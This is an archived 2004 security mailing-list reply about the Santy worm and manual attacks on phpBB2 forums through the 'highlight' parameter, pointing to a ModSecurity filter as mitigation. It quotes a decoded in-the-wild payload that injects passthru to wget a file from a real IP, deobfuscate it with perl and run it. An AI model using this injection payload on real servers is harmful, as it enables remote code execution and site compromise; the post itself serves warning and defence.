lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <Pine.LNX.4.44.0412232336230.27973-100000@bugsbunny.castlecops.com>
From: zx at castlecops.com (Paul Laudanski)
Subject: RE: Worm hitting PHPbb2 Forums

On Thu, 23 Dec 2004, Patrick Nolan wrote:

> A bot is not uploaded, not sure where that came from.
> And by now, it is not expected to be spreading at all, thanks to the
> interruption in search requests by Google.

There are a couple posts going on about this, for instance take this 
article:

http://www.cbronline.com/article_news.asp?guid=366C3494-1446-4A8B-973C-F67044266D35

[quote]
"Santy gets easily corrupted," F-Secure Corp's Mikko Hypponen said. "The 
exploit it uses is only able to transfer around 20 bytes of data at a 
time. So the worm transfers itself from one web site to another in small 
chunks."

"If a chunk gets missing, the worm might still work fine... or it might 
fail," Hypponen told ComputerWire. "More generations there are, more 
likely it is to fail because of this."
[/quote]

Compare that to an exploit that is posted @bugtraq:

http://www.securityfocus.com/archive/1/385208

(decoded)

[quote]
rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe 
y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/
.b| perl; rm -f .b *.pl b0t*; echo _END_
highlight='.passthru($HTTP_GET_VARS[rush]).'
[/quote]

It is making use of the highlight exploit in pre phpbb 2.0.11.

Even though the 'worm' itself may be hindered, we can certainly expect 
script kiddies to attempt these manually.

http://www.modsecurity.org/blog/archives/000046.html

Now that is catching the single quote in the highlight argument.

-- 
Regards,

Paul Laudanski - Computer Cops, LLC. CEO & Founder
CastleCops(SM) - http://castlecops.com
Promoting education and health in online security and privacy.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ